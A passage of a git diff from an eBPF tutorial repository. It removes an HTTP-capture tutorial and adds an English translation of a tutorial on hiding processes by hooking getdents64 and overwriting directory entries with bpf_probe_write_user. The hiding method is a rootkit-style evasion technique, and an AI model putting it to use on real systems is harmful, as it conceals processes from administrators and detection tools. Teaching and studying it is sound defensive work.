-```c -bpf_skb_load_bytes(skb, 12, &proto, 2); -proto = __bpf_ntohs(proto); -if (proto != ETH_P_IP) - return 0; -``` - -Here, the code loads the Ethernet frame type field from the packet, which tells us the network layer protocol being used in the packet. It then uses the `__bpf_ntohs` function to convert the network byte order type field into host byte order. Next, the code checks if the type field is not equal to the Ethernet frame type for IPv4 (0x0800). If it's not equal, it means the packet is not an IPv4 packet, and the function returns 0, indicating that the packet should not be processed. - -Key concepts to understand here: - -- Ethernet Frame: The Ethernet frame is a data link layer (Layer 2) protocol used for transmitting data frames within a local area network (LAN). Ethernet frames typically include destination MAC address, source MAC address, and frame type fields. -- Network Byte Order: Network protocols often use big-endian byte order to represent data. Therefore, data received from the network needs to be converted into host byte order for proper interpretation on the host. Here, the type field from the network is converted to host byte order for further processing. -- IPv4 Frame Type (ETH_P_IP): This represents the frame type field in the Ethernet frame, where 0x0800 indicates IPv4. - -```c -if (ip_is_fragment(skb, nhoff)) - return 0; -``` - -This part of the code checks if IP fragmentation is being handled. IP fragmentation is a mechanism for splitting larger IP packets into multiple smaller fragments for transmission. Here, if the packet is an IP fragment, the function returns 0, indicating that only complete packets will be processed. - -```c -static inline int ip_is_fragment(struct __sk_buff *skb, __u32 nhoff) -{ - __u16 frag_off; - - bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, frag_off), &frag_off, 2); - frag_off = __bpf_ntohs(frag_off); - return frag_off & (IP_MF | IP_OFFSET); -} -``` - -The above code is a helper function used to check if the incoming IPv4 packet is an IP fragment. IP fragmentation is a mechanism where, if the size of an IP packet exceeds the Maximum Transmission Unit (MTU) of the network, routers split it into smaller fragments for transmission across the network. The purpose of this function is to examine the fragment flags and fragment offset fields within the packet to determine if it is a fragment. - -Here's an explanation of the code line by line: - -1. `__u16 frag_off;`: Defines a 16-bit unsigned integer variable `frag_off` to store the fragment offset field. -2. `bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, frag_off), &frag_off, 2);`: This line of code uses the `bpf_skb_load_bytes` function to load the fragment offset field from the packet. `nhoff` is the offset of the IP header within the packet, and `offsetof(struct iphdr, frag_off)` calculates the offset of the fragment offset field within the IPv4 header. -3. `frag_off = __bpf_ntohs(frag_off);`: Converts the loaded fragment offset field from network byte order (big-endian) to host byte order. Network protocols typically use big-endian to represent data, and the conversion to host byte order is done for further processing. -4. `return frag_off & (IP_MF | IP_OFFSET);`: This line of code checks the value of the fragment offset field using a bitwise AND operation with two flag values: - - `IP_MF`: Represents the "More Fragments" flag. If this flag is set to 1, it indicates that the packet is part of a fragmented sequence and more fragments are expected. - - `IP_OFFSET`: Represents the fragment offset field. If the fragment offset field is non-zero, it indicates that the packet is part of a fragmented sequence and has a fragment offset value. - If either of these flags is set to 1, the result is non-zero, indicating that the packet is an IP fragment. If both flags are 0, it means the packet is not fragmented. - -It's important to note that the fragment offset field in the IP header is specified in units of 8 bytes, so the actual byte offset is obtained by left-shifting the value by 3 bits. Additionally, the "More Fragments" flag (IP_MF) in the IP header indicates whether there are more fragments in the sequence and is typically used in conjunction with the fragment offset field to indicate the status of fragmented packets. - -```c -bpf_skb_load_bytes(skb, ETH_HLEN, & - -hdr_len, sizeof(hdr_len)); -hdr_len &= 0x0f; -hdr_len *= 4; -``` - -In this part of the code, the length of the IP header is loaded from the packet. The IP header length field contains information about the length of the IP header in units of 4 bytes, and it needs to be converted to bytes. Here, it is converted by performing a bitwise AND operation with 0x0f and then multiplying it by 4. - -Key concept: - -- IP Header: The IP header contains fundamental information about a packet, such as the source IP address, destination IP address, protocol type, total length, identification, flags, fragment offset, time to live (TTL), checksum, source port, and destination port. - -```c -if (hdr_len < sizeof(struct iphdr)) -{ - return 0; -} -``` - -This code segment checks if the length of the IP header meets the minimum length requirement, typically 20 bytes. If the length of the IP header is less than 20 bytes, it indicates an incomplete or corrupted packet, and the function returns 0, indicating that the packet should not be processed. - -Key concept: - -- `struct iphdr`: This is a structure defined in the Linux kernel, representing the format of an IPv4 header. It includes fields such as version, header length, service type, total length, identification, flags, fragment offset, time to live, protocol, header checksum, source IP address, and destination IP address, among others. - -```c -bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, protocol), &ip_proto, 1); -if (ip_proto != IPPROTO_TCP) -{ - return 0; -} -``` - -Here, the code loads the protocol field from the IP header to determine the transport layer protocol used in the packet. Then, it checks if the protocol field is not equal to the value for TCP (IPPROTO_TCP). If it's not TCP, it means the packet is not an HTTP request or response, and the function returns 0. - -Key concept: - -- Transport Layer Protocol: The protocol field in the IP header indicates the transport layer protocol used in the packet, such as TCP, UDP, or ICMP. - -```c -tcp_hdr_len = nhoff + hdr_len; -``` - -This line of code calculates the offset of the TCP header. It adds the length of the Ethernet frame header (`nhoff`) to the length of the IP header (`hdr_len`) to obtain the starting position of the TCP header. - -```c -bpf_skb_load_bytes(skb, nhoff + 0, &verlen, 1); -``` - -This line of code loads the first byte of the TCP header from the packet, which contains information about the TCP header length. This length field is specified in units of 4 bytes and requires further conversion. - -```c -bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, tot_len), &tlen, sizeof(tlen)); -``` - -This line of code loads the total length field of the IP header from the packet. The IP header's total length field represents the overall length of the IP packet, including both the IP header and the data portion. - -```c -__u8 doff; -bpf_skb_load_bytes(skb, tcp_hdr_len + offsetof(struct __tcphdr, ack_seq) + 4, &doff, sizeof(doff)); -doff &= 0xf0; -doff >>= 4; -doff *= 4; -``` - -This piece of code is used to calculate the length of the TCP header. It loads the Data Offset field (also known as the Header Length field) from the TCP header, which represents the length of the TCP header in units of 4 bytes. The code clears the high four bits of the offset field, then shifts it right by 4 bits, and finally multiplies it by 4 to obtain the actual length of the TCP header. - -Key points to understand: - -- TCP Header: The TCP header contains information related to the TCP protocol, such as source port, destination port, sequence number, acknowledgment number, flags (e.g., SYN, ACK, FIN), window size, and checksum. - -```c -payload_offset = ETH_HLEN + hdr_len + doff; -payload_length = __bpf_ntohs(tlen) - hdr_len - doff; -``` - -These two lines of code calculate the offset and length of the HTTP request payload. They add the lengths of the Ethernet frame header, IP header, and TCP header together to obtain the offset to the data portion of the HTTP request. Then, by subtracting the total length, IP header length, and TCP header length from the total length field, they calculate the length of the HTTP request data. - -Key point: - -- HTTP Request Payload: The actual data portion included in an HTTP request, typically consisting of the HTTP request headers and request body. - -```c -char line_buffer[7]; -if (payload_length < 7 || payload_offset < 0) -{ - return 0; -} -bpf_skb_load_bytes(skb, payload_offset, line_buffer, 7); -bpf_printk("%d len %d buffer: %s", payload_offset, payload_length, line_buffer); -``` - -This portion of the code loads the first 7 bytes of the HTTP request line and stores them in a character array named `line_buffer`. It then checks if the length of the HTTP request data is less than 7 bytes or if the offset is negative. If these conditions are met, it indicates an incomplete HTTP request, and the function returns 0. Finally, it uses the `bpf_printk` function to print the content of the HTTP request line to the kernel log for debugging and analysis. - -```c -if (bpf_strncmp(line_buffer, 3, "GET") != 0 && - bpf_strncmp(line_buffer, 4, "POST") != 0 && - bpf_strncmp(line_buffer, 3, "PUT") != 0 && - bpf_strncmp(line_buffer, 6, "DELETE") != 0 && - bpf_strncmp(line_buffer, 4, "HTTP") != 0) -{ - return 0; -} -``` - -> Note: The `bpf_strncmp` function is a helper function available from kernel version 5.17. For earlier versions, you can manually write a function to compare strings. - -This piece of code uses the `bpf_strncmp` function to compare the data in `line_buffer` with HTTP request methods (GET, POST, PUT, DELETE, HTTP). If there is no match, indicating that it is not an HTTP request, it returns 0, indicating that it should not be processed. - -```c -e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); -if (!e) - return 0; -``` - -This section of the code attempts to reserve a block of memory from the BPF ring buffer to store event information. If it cannot reserve the memory block, it returns 0. The BPF ring buffer is used to pass event data between the eBPF program and user space. - -Key point: - -- BPF Ring Buffer: The BPF ring buffer is a mechanism for passing data between eBPF programs and user space. It can be used to store event information for further processing or analysis by user space applications. - -```c -e->ip_proto = ip_proto; -bpf_skb_load_bytes(skb, nhoff + hdr_len, &(e->ports), 4); -e->pkt_type = skb->pkt_type; -e->ifindex = skb->ifindex; - -e->payload_length = payload_length; -bpf_skb_load_bytes(skb, payload_offset, e->payload, MAX_BUF_SIZE); - -bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, saddr), &(e->src_addr), 4); -bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, daddr), &(e->dst_addr), 4); -bpf_ringbuf_submit(e, 0); - -return skb->len; -``` - -Finally, this code segment stores the captured event information in the `e` structure and submits it to the BPF ring buffer. It includes information such as the captured IP protocol, source and destination ports, packet type, interface index, payload length, source IP address, and destination IP address. Finally, it returns the length of the packet, indicating that the packet was successfully processed. - -This code is primarily used to store captured event information for further processing. The BPF ring buffer is used to pass this information to user space for additional handling or logging. - -In summary, this eBPF program's main task is to capture HTTP requests. It accomplishes this by parsing the Ethernet frame, IP header, and TCP header of incoming packets to determine if they contain HTTP requests. Information about the requests is then stored in the `so_event` structure and submitted to the BPF ring buffer. This is an efficient method for capturing HTTP traffic at the kernel level and is suitable for applications such as network monitoring and security analysis. - -### Potential Limitations - -The above code has some potential limitations, and one of the main limitations is that it cannot handle URLs that span multiple packets. - -- Cross-Packet URLs: The code checks the URL in an HTTP request by parsing a single data packet. If the URL of an HTTP request spans multiple packets, it will only examine the URL in the first packet. This can lead to missing or partially capturing long URLs that span multiple data packets. - -To address this issue, a solution often involves reassembling multiple packets to reconstruct the complete HTTP request. This may require implementing packet caching and assembly logic within the eBPF program and waiting to collect all relevant packets until the HTTP request is detected. This adds complexity and may require additional memory to handle cases where URLs span multiple packets. - -### User-Space Code - -The user-space code's main purpose is to create a raw socket and then attach the previously defined eBPF program in the kernel to that socket, allowing the eBPF program to capture and process network packets received on that socket. Here's an example of the user-space code: - -```c -/* Create raw socket for localhost interface */ -sock = open_raw_sock(interface); -if (sock < 0) { - err = -2; - fprintf(stderr, "Failed to open raw socket\n"); - goto cleanup; -} - -/* Attach BPF program to raw socket */ -prog_fd = bpf_program__fd(skel->progs.socket_handler); -if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))) { - err = -3; - fprintf(stderr, "Failed to attach to raw socket\n"); - goto cleanup; -} -``` - -1. `sock = open_raw_sock(interface);`: This line of code calls a custom function `open_raw_sock`, which is used to create a raw socket. Raw sockets allow a user-space application to handle network packets directly without going through the protocol stack. The `interface` parameter might specify the network interface from which to receive packets, determining where to capture packets from. If creating the socket fails, it returns a negative value, otherwise, it returns the file descriptor of the socket `sock`. -2. If the value of `sock` is less than 0, indicating a failure to open the raw socket, it sets `err` to -2 and prints an error message on the standard error stream. -3. `prog_fd = bpf_program__fd(skel->progs.socket_handler);`: This line of code retrieves the file descriptor of the socket filter program (`socket_handler`) previously defined in the eBPF program. It is necessary to attach this program to the socket. `skel` is a pointer to an eBPF program object, and it provides access to the program collection. -4. `setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))`: This line of code uses the `setsockopt` system call to attach the eBPF program to the raw socket. It sets the `SO_ATTACH_BPF` option and passes the file descriptor of the eBPF program to the option, letting the kernel know which eBPF program to apply to this socket. If the attachment is successful, the socket starts capturing and processing network packets received on it. -5. If `setsockopt` fails, it sets `err` to -3 and prints an error message on the standard error stream. - -### Compilation and Execution - -The complete source code can be found at . To compile and run the code: - -```console -$ git submodule update --init --recursive -$ make - BPF .output/sockfilter.bpf.o - GEN-SKEL .output/sockfilter.skel.h - CC .output/sockfilter.o - BINARY sockfilter -$ sudo ./sockfilter -... -``` - -In another terminal, start a simple web server using Python: - -```console -python3 -m http.server -Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... -127.0.0.1 - - [18/Sep/2023 01:05:52] "GET / HTTP/1.1" 200 - -``` - -You can use `curl` to make requests: - -```c -$ curl http://0.0.0.0:8000/ - - - - -Directory listing for / -.... -``` - -In the eBPF program, you can see that it prints the content of HTTP requests: - -```console -127.0.0.1:34552(src) -> 127.0.0.1:8000(dst) -payload: GET / HTTP/1.1 -Host: 0.0.0.0:8000 -User-Agent: curl/7.88.1 -... -127.0.0.1:8000(src) -> 127.0.0.1:34552(dst) -payload: HTTP/1.0 200 OK -Server: SimpleHTTP/0.6 Python/3.11.4 -... -``` - -It captures both request and response content. - -## Capturing HTTP Traffic Using eBPF Syscall Tracepoints - -eBPF provides a powerful mechanism for tracing system calls at the kernel level. In this example, we'll use eBPF to trace the `accept` and `read` system calls to capture HTTP traffic. Due to space limitations, we'll provide a brief overview of the code framework. - -```c -struct -{ - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 4096); - __type(key, u64); - __type(value, struct accept_args_t); -} active_accept_args_map SEC(".maps"); - -// Define a tracepoint at the entry of the accept system call -SEC("tracepoint/syscalls/sys_enter_accept") -int sys_enter_accept(struct trace_event_raw_sys_enter *ctx) -{ - u64 id = bpf_get_current_pid_tgid(); - // ... Get and store the arguments of the accept call - bpf_map_update_elem(&active_accept_args_map, &id, &accept_args, BPF_ANY); - return 0; -} - -// Define a tracepoint at the exit of the accept system call -SEC("tracepoint/syscalls/sys_exit_accept") -int sys_exit_accept(struct trace_event_raw_sys_exit *ctx) -{ - // ... Process the result of the accept call - struct accept_args_t *args = - bpf_map_lookup_elem(&active_accept_args_map, &id); - // ... Get and store the socket file descriptor obtained from the accept call - __u64 pid_fd = ((__u64)pid << 32) | (u32)ret_fd; - bpf_map_update_elem(&conn_info_map, &pid_fd, &conn_info, BPF_ANY); - // ... -} - -struct -{ - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 4096); - __type(key, u64); - __type(value, struct data_args_t); -} active_read_args_map SEC(".maps"); - -// Define a tracepoint at the entry of the read system call -SEC("tracepoint/syscalls/sys_enter_read") -int sys_enter_read(struct trace_event_raw_sys_enter *ctx) -{ - // ... Get and store the arguments of the read call - bpf_map_update_elem(&active_read_args_map, &id, &read_args, BPF_ANY); - return 0; -} - -// Helper function to check if it's an HTTP connection -static inline bool is_http_connection(const char *line_buffer, u64 bytes_count) -{ - // ... Check if the data is an HTTP request or response -} - -// Helper function to process the read data -static inline void process_data(struct trace_event_raw_sys_exit *ctx, - u64 id, const struct data_args_t *args, u64 bytes_count) -{ - // ... Process the read data, check if it's HTTP traffic, and send events - if (is_http_connection(line_buffer, bytes_count)) - { - // ... - bpf_probe_read_kernel(&event.msg, read_size, args->buf); - // ... - bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, - &event, sizeof(struct socket_data_event_t)); - } -} - -// Define a tracepoint at the exit of the read system call -SEC("tracepoint/syscalls/sys_exit_read") -int sys_exit_read(struct trace_event_raw_sys_exit *ctx) -{ - // ... Process the result of the read call - struct data_args_t *read_args = bpf_map_lookup_elem(&active_read_args_map, &id); - if (read_args != NULL) - { - process_data(ctx, id, read_args, bytes_count); - } - // ... - return 0; -} - -char _license[] SEC("license") = "GPL"; -``` - -This code briefly demonstrates how to use eBPF to trace system calls in the Linux kernel to capture HTTP traffic. Here's a detailed explanation of the hook locations and the flow, as well as the complete set of system calls that need to be hooked for comprehensive request tracing: - -### Hook Locations and Flow - -- The code uses eBPF Tracepoint functionality. Specifically, it defines a series of eBPF programs and binds them to specific system call Tracepoints to capture entry and exit events of these system calls. - -- First, it defines two eBPF hash maps (`active_accept_args_map` and `active_read_args_map`) to store system call parameters. These maps are used to track `accept` and `read` system calls. - -- Next, it defines multiple Tracepoint tracing programs, including: - - `sys_enter_accept`: Defined at the entry of the `accept` system call, used to capture the arguments of the `accept` system call and store them in the hash map. - - `sys_exit_accept`: Defined at the exit of the `accept` system call, used to process the result of the `accept` system call, including obtaining and storing the new socket file descriptor and related connection information. - - `sys_enter_read`: Defined at the entry of the `read` system call, used to capture the arguments of the `read` system call and store them in the hash map. - - `sys_exit_read`: Defined at the exit of the `read` system call, used to process the result of the `read` system call, including checking if the read data is HTTP traffic and sending events. - -- In `sys_exit_accept` and `sys_exit_read`, there is also some data processing and event sending logic, such as checking if the data is an HTTP connection, assembling event data, and using `bpf_perf_event_output` to send events to user space for further processing. - -### Complete Set of System Calls to Hook - -To fully implement HTTP request tracing, the system calls that typically need to be hooked include: - -- `socket`: Used to capture socket creation for tracking new connections. -- `bind`: Used to obtain port information where the socket is bound. -- `listen`: Used to start listening for connection requests. -- `accept`: Used to accept connection requests and obtain new socket file descriptors. -- `read`: Used to capture received data and check if it contains HTTP requests. -- `write`: Used to capture sent data and check if it contains HTTP responses. - -The provided code already covers the tracing of `accept` and `read` system calls. To complete HTTP request tracing, additional system calls need to be hooked, and corresponding logic needs to be implemented to handle the parameters and results of these system calls. - -The complete source code can be found at . - -## Summary - -In today's complex technological landscape, system observability has become crucial, especially in the context of microservices and cloud-native applications. This article explores how to leverage eBPF technology for tracing the seven-layer protocols, along with the challenges and solutions that may arise in this process. Here's a summary of the content covered in this article: - -1. **Introduction**: - - Modern applications often consist of multiple microservices and distributed components, making it essential to observe the behavior of the entire system. - - Seven-layer protocols (such as HTTP, gRPC, MQTT, etc.) provide detailed insights into application interactions, but monitoring these protocols can be challenging. - -2. **Role of eBPF Technology**: - - eBPF allows developers to dive deep into the kernel layer for real-time observation and analysis of system behavior without modifying or inserting application code. - - eBPF technology offers a powerful tool for monitoring seven-layer protocols, especially in a microservices environment. - -3. **Tracing Seven-Layer Protocols**: - - The article discusses the challenges of tracing seven-layer protocols, including their complexity and dynamism. - - Traditional network monitoring tools struggle with the complexity of seven-layer protocols. - -4. **Applications of eBPF**: - - eBPF provides two primary methods for tracing seven-layer protocols: socket filters and syscall tracing. - - Both of these methods help capture network request data for protocols like HTTP and analyze them. - -5. **eBPF Practical Tutorial**: - - The article provides a practical eBPF tutorial demonstrating how to capture and analyze HTTP traffic using eBPF socket filters or syscall tracing. - - The tutorial covers the development of eBPF programs, the use of the eBPF toolchain, and the implementation of HTTP request tracing. - -Through this article, readers can gain a deep understanding of how to use eBPF technology for tracing seven-layer protocols, particularly HTTP traffic. This knowledge will help enhance the monitoring and analysis of network traffic, thereby improving application performance and security. If you're interested in learning more about eBPF and its practical applications, you can visit our tutorial code repository at or our website at for more examples and complete tutorials. - -> The original link of this article: diff --git a/src/24-hide/README.md b/src/24-hide/README.md index e841921..437af5a 100644 --- a/src/24-hide/README.md +++ b/src/24-hide/README.md @@ -1,20 +1,20 @@ -# eBPF 开发实践:使用 eBPF 隐藏进程或文件信息 +# eBPF Practical Tutorial: Hiding Process or File Information -eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。 +eBPF (Extended Berkeley Packet Filter) is a powerful feature in the Linux kernel that allows you to run, load, and update user-defined code without having to change the kernel source code or reboot the kernel. This capability allows eBPF to be used in a wide range of applications such as network and system performance analysis, packet filtering, and security policies. -在本篇教程中,我们将展示如何利用 eBPF 来隐藏进程或文件信息,这是网络安全和防御领域中一种常见的技术。 +In this tutorial, we will show how eBPF can be used to hide process or file information, a common technique in the field of network security and defence. -## 背景知识与实现机制 +## Background Knowledge and Implementation Mechanism -"进程隐藏" 能让特定的进程对操作系统的常规检测机制变得不可见。在黑客攻击或系统防御的场景中,这种技术都可能被应用。具体来说,Linux 系统中每个进程都在 /proc/ 目录下有一个以其进程 ID 命名的子文件夹,包含了该进程的各种信息。`ps` 命令就是通过查找这些文件夹来显示进程信息的。因此,如果我们能隐藏某个进程的 /proc/ 文件夹,就能让这个进程对 `ps` 命令等检测手段“隐身”。 +"Process hiding" enables a specific process to become invisible to the operating system's regular detection mechanisms. This technique can be used in both hacking and system defence scenarios. Specifically, each process on a Linux system has a subfolder named after its process ID in the /proc/ directory, which contains various information about the process. `ps` displays process information by looking in these folders. Therefore, if we can hide the /proc/ folder of a process, we can make that process invisible to `ps` commands and other detection methods. -要实现进程隐藏,关键在于操作 `/proc/` 目录。在 Linux 中,`getdents64` 系统调用可以读取目录下的文件信息。我们可以通过挂接这个系统调用,修改它返回的结果,从而达到隐藏文件的目的。实现这个功能需要使用到 eBPF 的 `bpf_probe_write_user` 功能,它可以修改用户空间的内存,因此能用来修改 `getdents64` 返回的结果。 +The key to achieving process hiding is to manipulate the `/proc/` directory. In Linux, the `getdents64` system call can read the information of files in the directory. We can hide files by hooking into this system call and modifying the results it returns. To do this, you need to use eBPF's `bpf_probe_write_user` function, which can modify user-space memory, and therefore can be used to modify the results returned by `getdents64`. -下面,我们会详细介绍如何在内核态和用户态编写 eBPF 程序来实现进程隐藏。 +In the following, we will describe in detail how to write eBPF programs in both kernel and user states to implement process hiding. -### 内核态 eBPF 程序实现 +### Kernel eBPF Program Implementation -接下来,我们将详细介绍如何在内核态编写 eBPF 程序来实现进程隐藏。首先是 eBPF 程序的起始部分: +Next, we will describe in detail how to write eBPF program to implement process hiding in kernel state. The first part of the eBPF programme is the start: ```c // SPDX-License-Identifier: BSD-3-Clause @@ -66,28 +66,28 @@ struct { } map_prog_array SEC(".maps"); ``` -我们首先需要理解这个 eBPF 程序的基本构成和使用到的几个重要组件。前几行引用了几个重要的头文件,如 "vmlinux.h"、"bpf_helpers.h"、"bpf_tracing.h" 和 "bpf_core_read.h"。这些文件提供了 eBPF 编程所需的基础设施和一些重要的函数或宏。 +The first thing we need to do is to understand the basic structure of the eBPF programme and the important components that are used. The first few lines reference several important header files, such as "vmlinux.h", "bpf_helpers.h", "bpf_tracing.h" and "bpf_core_read.h". These files provide the infrastructure needed for eBPF programming and some important functions or macros. -- "vmlinux.h" 是一个包含了完整的内核数据结构的头文件,是从 vmlinux 内核二进制中提取的。使用这个头文件,eBPF 程序可以访问内核的数据结构。 -- "bpf_helpers.h" 头文件中定义了一系列的宏,这些宏是 eBPF 程序使用的 BPF 助手(helper)函数的封装。这些 BPF 助手函数是 eBPF 程序和内核交互的主要方式。 -- "bpf_tracing.h" 是用于跟踪事件的头文件,它包含了许多宏和函数,这些都是为了简化 eBPF 程序对跟踪点(tracepoint)的操作。 -- "bpf_core_read.h" 头文件提供了一组用于从内核读取数据的宏和函数。 +- "vmlinux.h" is a header file containing the complete kernel data structures extracted from the vmlinux kernel binary. Using this header file, eBPF programs can access kernel data structures. +- The "bpf_helpers.h" header file defines a series of macros that encapsulate the BPF helper functions used by eBPF programs. These BPF helper functions are the main way that eBPF programs interact with the kernel. +- The "bpf_tracing.h" header file for tracing events contains a number of macros and functions designed to simplify the operation of tracepoints for eBPF programs. +- The "bpf_core_read.h" header file provides a set of macros and functions for reading data from the kernel. -程序中定义了一系列的 map 结构,这些 map 是 eBPF 程序中的主要数据结构,它们用于在内核态和用户态之间共享数据,或者在 eBPF 程序中存储和传递数据。 +The program defines a series of map structures, which are the main data structures in an eBPF program, and are used to share data between the kernel and the user, or to store and transfer data within the eBPF program. -其中,"rb" 是一个 Ringbuffer 类型的 map,它用于从内核向用户态传递消息。Ringbuffer 是一种能在内核和用户态之间高效传递大量数据的数据结构。 +Among them, "rb" is a map of type Ringbuffer, which is used to pass messages from the kernel to the userland; Ringbuffer is a data structure that can efficiently pass large amounts of data between the kernel and the userland. -"map_buffs" 是一个 Hash 类型的 map,它用于存储目录项(dentry)的缓冲区地址。 +"map_buffs" is a map of type Hash which is used to store buffer addresses for directory entries. -"map_bytes_read" 是另一个 Hash 类型的 map,它用于在数据循环中启用搜索。 +"map_bytes_read" is another Hash-type map that is used to enable searching in data loops. -"map_to_patch" 是另一个 Hash 类型的 map,存储了需要被修改的目录项(dentry)的地址。 +"map_to_patch" is another Hash type map that stores the address of the directory entry (dentry) that needs to be modified. -"map_prog_array" 是一个 Prog Array 类型的 map,它用于保存程序的尾部调用。 +"map_prog_array" is a map of type Prog Array, which is used to store the tail calls of a programme. -程序中的 "target_ppid" 和 "pid_to_hide_len"、"pid_to_hide" 是几个重要的全局变量,它们分别存储了目标父进程的 PID、需要隐藏的 PID 的长度以及需要隐藏的 PID。 +The "target_ppid" and "pid_to_hide_len" and "pid_to_hide" in the program are a few important global variables that store the PID of the target parent process, the length of the PID that needs to be hidden, and the PID that needs to be hidden, respectively. -接下来的代码部分,程序定义了一个名为 "linux_dirent64" 的结构体,这个结构体代表一个 Linux 目录项。然后程序定义了两个函数,"handle_getdents_enter" 和 "handle_getdents_exit",这两个函数分别在 getdents64 系统调用的入口和出口被调用,用于实现对目录项的操作。 +In the next part of the code, the program defines a structure called "linux_dirent64", which represents a Linux directory entry. The program then defines two functions, "handle_getdents_enter" and "handle_getdents_exit", which are called at the entry and exit of the getdents64 system call, respectively, and are used to implement operations on the directory entry. ```c @@ -132,23 +132,23 @@ int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx) } ``` -在这部分代码中,我们可以看到 eBPF 程序的一部分具体实现,该程序负责在 `getdents64` 系统调用的入口处进行处理。 +In this section of the code, we can see part of the implementation of the eBPF program that is responsible for the processing at the entry point of the `getdents64` system call. -我们首先声明了几个全局的变量。其中 `target_ppid` 代表我们要关注的目标父进程的 PID。如果这个值为 0,那么我们将关注所有的进程。`pid_to_hide_len` 和 `pid_to_hide` 则分别用来存储我们要隐藏的进程的 PID 的长度和 PID 本身。这个 PID 会转化成 `/proc/` 目录下的一个文件夹的名称,因此被隐藏的进程在 `/proc/` 目录下将无法被看到。 +We start by declaring a few global variables. The `target_ppid` represents the PID of the target parent we want to focus on, and if this value is 0, then we will focus on all processes. `pid_to_hide_len` and `pid_to_hide` are used to store the length of the PID of the process we want to hide from, and the PID itself, respectively. This PID is translated into the name of a folder in the `/proc/` directory, so the hidden process will not be visible in the `/proc/` directory. -接下来,我们声明了一个名为 `linux_dirent64` 的结构体。这个结构体代表一个 Linux 目录项,包含了一些元数据,如 inode 号、下一个目录项的偏移、当前目录项的长度、文件类型以及文件名。 +Next, we declare a structure called `linux_dirent64`. This structure represents a Linux directory entry and contains metadata such as the inode number, the offset of the next directory entry, the length of the current directory entry, the file type, and the filename. -然后是 `getdents64` 函数的原型。这个函数是 Linux 系统调用,用于读取一个目录的内容。我们的目标就是在这个函数执行的过程中,对目录项进行修改,以实现进程隐藏。 +Then there is the prototype for the `getdents64` function. This function is a Linux system call that reads the contents of a directory. Our goal is to modify the directory entries during the execution of this function to enable process hiding. -随后的部分是 eBPF 程序的具体实现。我们在 `getdents64` 系统调用的入口处定义了一个名为 `handle_getdents_enter` 的函数。这个函数首先获取了当前进程的 PID 和线程组 ID,然后检查这个进程是否是我们关注的进程。如果我们设置了 `target_ppid`,那么我们就只关注那些父进程的 PID 为 `target_ppid` 的进程。如果 `target_ppid` 为 0,我们就关注所有进程。 +The subsequent section is the concrete implementation of the eBPF program. We define a function called `handle_getdents_enter` at the entry point of the `getdents64` system call. This function first gets the PID and thread group ID of the current process, and then checks to see if it is the process we are interested in. If we set `target_ppid`, then we only focus on processes whose parent has a PID of `target_ppid`. If `target_ppid` is 0, we focus on all processes. -在确认了当前进程是我们关注的进程之后,我们将 `getdents64` 系统调用的参数保存到一个 map 中,以便在系统调用返回时使用。我们特别关注 `getdents64` 系统调用的第二个参数,它是一个指向 `linux_dirent64` 结构体的指针,代表了系统调用要读取的目录的内容。我们将这个指针以及当前的 PID 和线程组 ID 作为键值对保存到 `map_buffs` 这个 map 中。 +After confirming that the current process is the one we are interested in, we save the arguments to the `getdents64` system call into a map to be used when the system call returns. In particular, we focus on the second argument to the `getdents64` system call, which is a pointer to the `linux_dirent64` structure representing the contents of the directory to be read by the system call. We save this pointer, along with the current PID and thread group ID, as a key-value pair in the `map_buffs` map. -至此,我们完成了 `getdents64` 系统调用入口处的处理。在系统调用返回时,我们将会在 `handle_getdents_exit` 函数中,对目录项进行修改,以实现进程隐藏。 +This completes the processing at the entry point of the `getdents64` system call. When the system call returns, we will modify the directory entry in the `handle_getdents_exit` function to hide the process. -在接下来的代码段中,我们将要实现在 `getdents64` 系统调用返回时的处理。我们主要的目标就是找到我们想要隐藏的进程,并且对目录项进行修改以实现隐藏。 +In the next snippet, we will implement the handling at the return of the `getdents64` system call. Our main goal is to find the process we want to hide and modify the directory entry to hide it. -我们首先定义了一个名为 `handle_getdents_exit` 的函数,它将在 `getdents64` 系统调用返回时被调用。 +We start by defining a function called `handle_getdents_exit` that will be called when the `getdents64` system call returns. ```c @@ -226,11 +226,11 @@ int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx) ``` -在这个函数中,我们首先获取了当前进程的 PID 和线程组 ID,然后检查系统调用是否读取到了目录的内容。如果没有读取到内容,我们就直接返回。 +In this function, we first get the PID and thread group ID of the current process, and then check to see if the system call has read the contents of the directory. If it didn't read the contents, we just return. -然后我们从 `map_buffs` 这个 map 中获取 `getdents64` 系统调用入口处保存的目录内容的地址。如果我们没有保存过这个地址,那么就没有必要进行进一步的处理。 +Then we get the address of the directory contents saved at the entry point of the `getdents64` system call from the `map_buffs` map. If we haven't saved this address, then there's no need to do any further processing. -接下来的部分有点复杂,我们用了一个循环来迭代读取目录的内容,并且检查是否有我们想要隐藏的进程的 PID。如果我们找到了,我们就用 `bpf_tail_call` 函数跳转到 `handle_getdents_patch` 函数,进行实际的隐藏操作。 +The next part is a bit more complicated, we use a loop to iteratively read the contents of the directory and check to see if we have the PID of the process we want to hide, and if we do, we use the `bpf_tail_call` function to jump to the `handle_getdents_patch` function to do the actual hiding. ```c SEC("tp/syscalls/sys_exit_getdents64") @@ -284,26 +284,26 @@ int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx) ``` -在 `handle_getdents_patch` 函数中,我们首先检查我们是否已经找到了我们想要隐藏的进程的 PID。然后我们读取目录项的内容,并且修改 `d_reclen` 字段,让它覆盖下一个目录项,这样就可以隐藏我们的目标进程了。 +In the `handle_getdents_patch` function, we first check to see if we have found the 